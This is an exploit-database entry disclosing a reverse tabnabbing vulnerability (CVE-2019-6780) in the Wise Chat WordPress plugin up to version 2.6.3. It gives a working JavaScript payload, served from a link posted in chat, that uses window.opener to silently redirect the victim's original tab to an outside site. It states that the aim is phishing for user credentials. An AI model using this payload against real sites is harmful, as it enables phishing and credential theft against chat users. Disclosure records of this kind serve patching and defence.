Wordpress Wisechat 2.6.3 Plugin - Reverse Tabnabbing Vulnerability

ID 1337DAY-ID-32058
Type zdt
Reporter MTK
Modified 2019-01-25T00:00:00


Exploit for php platform in category web applications

                                            # Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.

# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.

Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html

if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
Open Redirect TEST

when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.

#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.

# References:

#  0day.today [2019-02-06]  #